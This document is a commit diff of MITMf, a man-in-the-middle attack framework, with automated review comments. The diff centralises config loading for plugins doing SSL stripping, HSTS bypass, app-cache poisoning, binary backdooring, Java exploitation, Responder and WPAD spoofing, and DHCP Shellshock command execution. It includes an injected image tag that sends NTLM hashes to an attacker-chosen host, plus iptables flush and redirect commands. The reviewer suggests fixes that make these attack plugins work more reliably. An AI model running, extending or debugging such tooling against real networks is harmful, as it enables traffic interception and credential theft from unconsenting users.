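Review bot: `global Challange; Challenge = ""` declares the wrong name, so `Challenge` is bound as a local of start_responder and the module-level `Challenge` that the rest of the file previously read from the old top-level loop is never populated; it should be `global Challenge; Challenge = ""`. The four `RespondTo.split(",")`-style calls discard their result, as they did at module level before, so these settings stay plain comma-separated strings unless a consumer splits them again — fine if intended, but a comment such as `# kept as comma-separated strings; consumers split on demand` would make that deliberate. `if len(NumChal) is not 16:` compares by identity; `if len(NumChal) != 16:` is the correct test and does not depend on small-int caching. SSLcert and SSLkey are now module globals that SSlSock.__init__ reads, so an SSlSock created before start_responder has run would raise NameError — presumably the callers guarantee the ordering, but a one-line comment on the two globals would record that assumption. start_responder continues past the end of the hunk.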


@ -18,7 +18,6 @@
import re, os import re, os
import logging import logging
from configobj import ConfigObj
class URLMonitor: class URLMonitor:
@ -44,12 +43,7 @@ class URLMonitor:
self.redirects = [] self.redirects = []
self.faviconReplacement = False self.faviconReplacement = False
self.hsts = False self.hsts = False
self.hsts_config = None
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url): def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery: for expression in URLMonitor.javascriptTrickery:
@ -138,9 +132,19 @@ class URLMonitor:
self.strippedURLs.add((client, url)) self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port) self.strippedURLPorts[(client, url)] = int(port)
def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,): def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing self.faviconSpoofing = faviconSpoofing
self.hsts = hstsbypass
def setHstsBypass(self, hstsconfig):
if hstsconfig:
self.hsts = True
self.hsts_config = hstsconfig
for k,v in self.hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def setClientLogging(self, clientLogging):
self.clientLogging = clientLogging self.clientLogging = clientLogging
def isFaviconSpoofing(self): def isFaviconSpoofing(self):
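Review bot: `self.hsts_config = None` was dropped from __init__ while setHstsBypass assigns `self.hsts_config` only when `hstsconfig` is truthy, so an instance whose bypass was never enabled (or was given an empty mapping) has no `hsts_config` attribute at all and any reader of it raises AttributeError; either restore the initialiser or assign `self.hsts_config = hstsconfig` before the `if`. setHstsBypass also never resets `self.hsts`, `self.sustitucion` or `self.real`, so a second call merges into the earlier mapping rather than replacing it — acceptable if it is only ever called once, but worth stating in a docstring such as `"""Enable HSTS bypass from a {real_domain: fake_domain} mapping; the reverse mapping is recorded in self.real."""`. The class continues outside the hunk.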


@ -15,7 +15,7 @@ except:
sys.exit("[-] user_agents library not installed!") sys.exit("[-] user_agents library not installed!")
try: try:
import configobj from configobj import ConfigObj
except: except:
sys.exit("[-] configobj library not installed!") sys.exit("[-] configobj library not installed!")
@ -29,21 +29,23 @@ sergio_version = "0.2.1"
if __name__ == "__main__": if __name__ == "__main__":
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add MITMf options
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
mgroup.add_argument("-i", "--interface", type=str, metavar="interface" ,help="Interface to listen on")
mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.cfg", metavar='configfile', help="Specify config file to use")
mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies')
#add sslstrip options #add sslstrip options
sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library") sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).") #sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
slogopts = sgroup.add_mutually_exclusive_group() slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet #slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
sgroup.add_argument("-i", "--interface", type=str, required=True, metavar="interface" ,help="Interface to listen on")
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
#Initialize plugins #Initialize plugins
plugins = [] plugins = []
@ -69,6 +71,23 @@ if __name__ == "__main__":
args = parser.parse_args() args = parser.parse_args()
try:
configfile = ConfigObj(args.configfile)
except Exception, e:
sys.exit("[-] Error parsing config file: " + str(e))
config_args = configfile['MITMf']['args']
if config_args:
print "[*] Loading arguments from config file"
for arg in config_args.split(' '):
sys.argv.append(arg)
args = parser.parse_args()
if not args.interface:
sys.exit("[-] -i , --interface argument is required")
args.configfile = configfile #so we can pass the configobj down to all the plugins
log_level = logging.__dict__[args.log_level.upper()] log_level = logging.__dict__[args.log_level.upper()]
#Start logging #Start logging
@ -84,7 +103,7 @@ if __name__ == "__main__":
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
if ('--responder' and '--wpad') in sys.argv: if ('--responder' and '--wpad') in sys.argv:
args.listen = 3141 args.listen = 3141
print "[*] Listening on port 3141 since --wpad was passed" print "[*] SSLstrip is now listening on port 3141 since --wpad was passed"
load = [] load = []
try: try:
@ -103,7 +122,7 @@ if __name__ == "__main__":
from libs.sslstrip.StrippingProxy import StrippingProxy from libs.sslstrip.StrippingProxy import StrippingProxy
from libs.sslstrip.URLMonitor import URLMonitor from libs.sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setValues(args.favicon, args.hsts) URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions) CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load) ProxyPlugins.getInstance().setPlugins(load)
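Review bot: `config_args = configfile['MITMf']['args']` in the hunk at `@ -69,6 +71,23 @@` sits outside the `try` that wraps `ConfigObj(args.configfile)`, so a config file without an `args` key dies with a raw KeyError traceback instead of the `[-] Error parsing config file` message; `config_args = configfile['MITMf'].get('args', '')` keeps the friendly failure. `config_args.split(' ')` turns a double or trailing space into empty-string arguments that argparse rejects as unrecognized and cannot carry a quoted value; `sys.argv.extend(shlex.split(config_args))` with `import shlex` handles both. Because the config-file arguments are appended after the command-line ones and the parser is re-run, a value-taking option given in both places resolves to the config-file value, which is worth stating in the `--config-file` help text. The `__main__` block continues outside the hunk.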


@ -1,15 +1,14 @@
#
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz # 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
#######################################################################################################
from plugins.plugin import Plugin from plugins.plugin import Plugin
from datetime import date from datetime import date
from libs.sslstrip.URLMonitor import URLMonitor from libs.sslstrip.URLMonitor import URLMonitor
import logging import logging
import ConfigParser
import re import re
import os.path import os.path
import time import time
import sys
class AppCachePlugin(Plugin): class AppCachePlugin(Plugin):
name = "App Cache Poison" name = "App Cache Poison"
@ -21,24 +20,15 @@ class AppCachePlugin(Plugin):
def initialize(self, options): def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace''' '''Called if plugin is enabled, passed the options namespace'''
self.options = options self.options = options
self.config_file = "./config/app_cache_poison.cfg"
self.config = None
self.mass_poisoned_browsers = [] self.mass_poisoned_browsers = []
self.urlMonitor = URLMonitor.getInstance() self.urlMonitor = URLMonitor.getInstance()
try:
self.config = options.configfile['AppCachePoison']
except Exception, e:
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
print "[*] App Cache Poison plugin online" print "[*] App Cache Poison plugin online"
self.createTamperer(self.config_file)
def parseConfig(self, configFile):
config = ConfigParser.ConfigParser()
config.read(configFile)
readConfig = config._sections
readConfig.update(config.defaults())
return readConfig
def createTamperer(self, configFile):
logging.debug("Reading tamper config file: %s" % (configFile))
self.config = self.parseConfig(configFile)
def handleResponse(self, request, data): def handleResponse(self, request, data):
@ -55,12 +45,12 @@ class AppCachePlugin(Plugin):
urls = self.urlMonitor.getRedirectionSet(url) urls = self.urlMonitor.getRedirectionSet(url)
(s,element,url) = self.getSectionForUrls(urls) (name,s,element,url) = self.getSectionForUrls(urls)
if not s: if s is False:
data = self.tryMassPoison(url, data, headers, req_headers, ip) data = self.tryMassPoison(url, data, headers, req_headers, ip)
return {'request': request, 'data': data} return {'request': request, 'data': data}
logging.debug("Found URL %s in section %s" % (url, s['__name__'])) logging.debug("Found URL %s in section %s" % (url, name))
p = self.getTemplatePrefix(s) p = self.getTemplatePrefix(s)
if element == 'tamper': if element == 'tamper':
logging.debug("Poisoning tamper URL with template %s" % (p)) logging.debug("Poisoning tamper URL with template %s" % (p))
@ -175,15 +165,16 @@ class AppCachePlugin(Plugin):
for i in self.config: for i in self.config:
if isinstance(self.config[i], dict): #section if isinstance(self.config[i], dict): #section
section = self.config[i] section = self.config[i]
name = i
if section.get('tamper_url',False) == url: if section.get('tamper_url',False) == url:
return (section, 'tamper',url) return (name, section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (section, 'tamper',url) return (name, section, 'tamper',url)
if section.get('manifest_url',False) == url: if section.get('manifest_url',False) == url:
return (section, 'manifest',url) return (name, section, 'manifest',url)
if section.get('raw_url',False) == url: if section.get('raw_url',False) == url:
return (section, 'raw',url) return (name, section, 'raw',url)
return (False,'',urls.copy().pop()) return (None, False,'',urls.copy().pop())
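Review bot: The removed `parseConfig` merged `config.defaults()` into every section, so any key from the old file's default block was reachable through each per-URL section; with `self.config = options.configfile['AppCachePoison']` those keys now live only at the top level of `[AppCachePoison]`. If `getTemplatePrefix(s)` or `tryMassPoison` (both outside the visible hunks) still read such keys from the per-URL section `s`, they need a fallback to the top level, e.g. `s.get(key, self.config.get(key))`. In the `getSectionForUrls` hunk, `section.has_key('tamper_url_match')` could become `'tamper_url_match' in section` to match the `section.get(...)` style of the neighbouring lines, and the `(None, False, '', ...)` sentinel deserves a one-line comment since the caller tests `s is False`. The class body continues outside the hunks.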


@ -9,11 +9,6 @@ import json
import threading import threading
import libs.beefapi as beefapi import libs.beefapi as beefapi
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING) requests_log.setLevel(logging.WARNING)
@ -27,8 +22,15 @@ class BeefAutorun(Inject, Plugin):
def initialize(self, options): def initialize(self, options):
self.options = options self.options = options
beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF'] try:
userconfig = ConfigObj("./config/beefautorun.cfg") beefconfig = options.configfile['MITMf']['BeEF']
except Exception, e:
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
try:
userconfig = options.configfile['BeEFAutorun']
except Exception, e:
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
self.Mode = userconfig['mode'] self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"] self.All_modules = userconfig["ALL"]
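Review bot: Both new `try` blocks catch `Exception` around a plain dictionary lookup, so a typo in the section name and an unrelated failure produce the same message and the traceback is lost; the lookups can hardly raise anything but KeyError for a missing section, so `except KeyError, e:` keeps other errors visible. The same pattern is introduced in this commit in AppCachePoison, JavaPwn, Responder and SSLstrip+. A brief comment on the first block, `# [MITMf][BeEF] holds the shared BeEF connection settings; [BeEFAutorun] holds this plugin's module lists`, would explain why two different sections are read. `initialize` continues outside the hunk.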


@ -2,7 +2,7 @@ from plugins.plugin import Plugin
class CacheKill(Plugin): class CacheKill(Plugin):
name = "CacheKill Plugin" name = "CacheKill"
optname = "cachekill" optname = "cachekill"
desc = "Kills page caching by modifying headers" desc = "Kills page caching by modifying headers"
implements = ["handleHeader", "connectionMade"] implements = ["handleHeader", "connectionMade"]


@ -88,7 +88,7 @@ class FilePwn(Plugin):
#NOT USED NOW #NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
self.userConfig = ConfigObj("./config/filepwn.cfg") self.userConfig = options.configfile['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
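Review bot: `self.userConfig = options.configfile['FilePwn']` is not wrapped in a `try`, so a config file missing the `[FilePwn]` section fails with a raw KeyError traceback while the other plugin hunks in this commit print a `[-] Error parsing config ...` message and exit (the Spoof hunks later in the commit have the same omission). For consistency: `try: self.userConfig = options.configfile['FilePwn']` / `except KeyError, e: sys.exit("[-] Error parsing config for FilePwn: " + str(e))`, assuming `sys` is imported in this module. The nested `['targets']['ALL'][...]` reads on the following lines would be covered too if they move inside the same block. `initialize` continues outside the hunk.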


@ -3,6 +3,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Er
from scapy.all import get_if_addr from scapy.all import get_if_addr
import time import time
import re import re
import sys
import argparse import argparse
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill from plugins.CacheKill import CacheKill


@ -9,7 +9,6 @@ import sys
import logging import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr from scapy.all import get_if_addr
from configobj import ConfigObj
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING) requests_log.setLevel(logging.WARNING)
@ -26,8 +25,15 @@ class JavaPwn(BrowserProfiler, Plugin):
self.options = options self.options = options
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
msfcfg = ConfigObj('./config/mitmf.cfg')['Metasploit'] try:
self.javacfg = ConfigObj('./config/javapwn.cfg') msfcfg = options.configfile['MITMf']['Metasploit']
except Exception, e:
sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
try:
self.javacfg = options.configfile['JavaPwn']
except Exception, e:
sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
self.msfport = msfcfg['msfport'] self.msfport = msfcfg['msfport']
self.rpcip = msfcfg['rpcip'] self.rpcip = msfcfg['rpcip']


@ -23,6 +23,11 @@ class Responder(Plugin):
if os.geteuid() != 0: if os.geteuid() != 0:
sys.exit("[-] Responder plugin requires root privileges") sys.exit("[-] Responder plugin requires root privileges")
try:
config = options.configfile['Responder']
except Exception, e:
sys.exit('[-] Error parsing config for Responder: ' + str(e))
try: try:
self.ip_address = get_if_addr(options.interface) self.ip_address = get_if_addr(options.interface)
if self.ip_address == "0.0.0.0": if self.ip_address == "0.0.0.0":
@ -32,16 +37,16 @@ class Responder(Plugin):
print "[*] Responder plugin online" print "[*] Responder plugin online"
DnsCache.getInstance().setCustomAddress(self.ip_address) DnsCache.getInstance().setCustomAddress(self.ip_address)
DnsCache.getInstance().setCustomRes('wpad', self.ip_address)
DnsCache.getInstance().setCustomRes('ISAProxySrv', self.ip_address) for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']:
DnsCache.getInstance().setCustomRes('RespProxySrv', self.ip_address) DnsCache.getInstance().setCustomRes(name, self.ip_address)
if '--spoof' not in sys.argv: if '--spoof' not in sys.argv:
print '[*] Setting up iptables' print '[*] Setting up iptables'
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen) os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)) t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config))
t.setDaemon(True) t.setDaemon(True)
t.start() t.start()


@ -1,5 +1,9 @@
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.Inject import Inject from plugins.Inject import Inject
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr
class SMBAuth(Inject, Plugin): class SMBAuth(Inject, Plugin):
@ -11,10 +15,19 @@ class SMBAuth(Inject, Plugin):
Inject.initialize(self, options) Inject.initialize(self, options)
self.target_ip = options.host self.target_ip = options.host
self.html_payload = self._get_data() self.html_payload = self._get_data()
if self.target_ip is None:
try:
self.target_ip = get_if_addr(options.interface)
if self.target_ip == "0.0.0.0":
sys.exit("[-] Interface %s does not have an IP address" % options.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
print "[*] SMBAuth plugin online" print "[*] SMBAuth plugin online"
def add_options(self, options): def add_options(self, options):
options.add_argument("--host", type=str, help="The ip address of your capture server") options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")
def _get_data(self): def _get_data(self):
return '<img src=\"\\\\%s\\image.jpg\">'\ return '<img src=\"\\\\%s\\image.jpg\">'\
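Review bot: `self.html_payload = self._get_data()` runs before the new fallback that fills `self.target_ip` from the interface, so if `_get_data` interpolates `self.target_ip` into the `<img src=...>` string (its body continues past the hunk, which the `%s` suggests), the payload built in the default `--host` case contains `None` instead of the interface address. Move the `self.html_payload = self._get_data()` line below the `if self.target_ip is None:` block. A short comment on the fallback, `# --host omitted: use the listening interface's own address as the capture server`, would record the intent the new help text describes. `initialize` continues outside the hunk.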

20
plugins/SSLstrip+.py Normal file

@ -0,0 +1,20 @@
from plugins.plugin import Plugin
from libs.sslstrip.URLMonitor import URLMonitor
import sys
class HSTSbypass(Plugin):
name = 'SSLstrip+'
optname = 'hsts'
desc = 'Enables SSLstrip+ for partial HSTS bypass'
has_opts = False
def initialize(self, options):
self.options = options
try:
config = options.configfile['SSLstrip+']
except Exception, e:
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
print "[*] SSLstrip+ plugin online"
URLMonitor.getInstance().setHstsBypass(config)
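Review bot: The new module is named `SSLstrip+.py`, and `+` is not valid in a Python identifier, so the file cannot be imported with an ordinary `import plugins.SSLstrip+` statement; this only works if the plugin loader imports by file path (not visible here), and a file name matching the class, `HSTSbypass.py`, would remove that dependency. The `except Exception, e:` around a dictionary lookup could be `except KeyError, e:` so that only the missing-section case is reported as `[-] Error parsing config for SSLstrip+`. The class has no docstring; a one-liner such as `'''Loads the [SSLstrip+] host-substitution map into URLMonitor to enable partial HSTS bypass'''` would match the triple-quoted style used in AppCachePoison.initialize.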


@ -20,7 +20,6 @@ from base64 import b64decode
from urllib import unquote from urllib import unquote
import binascii import binascii
import random import random
from configobj import ConfigObj
class Spoof(Plugin): class Spoof(Plugin):
@ -93,7 +92,7 @@ class Spoof(Plugin):
self.rand_number = [] self.rand_number = []
self.dhcp_dic = {} self.dhcp_dic = {}
self.dhcpcfg = ConfigObj("./config/dhcp.cfg") self.dhcpcfg = options.configfile['Spoof']['DHCP']
thread_target = self.dhcp_sniff thread_target = self.dhcp_sniff
thread_args = () thread_args = ()
@ -109,9 +108,9 @@ class Spoof(Plugin):
print "[*] DNS Tampering enabled" print "[*] DNS Tampering enabled"
if self.dns: if self.dns:
self.dnscfg = ConfigObj("./config/dns.cfg") self.dnscfg = options.configfile['Spoof']['DNS']
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg") self.hstscfg = options.configfile['SSLstrip+']
if not self.manualiptables: if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE') os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
@ -334,7 +333,7 @@ class Spoof(Plugin):
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries') options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--shellshock', type=str, dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]') options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]') options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')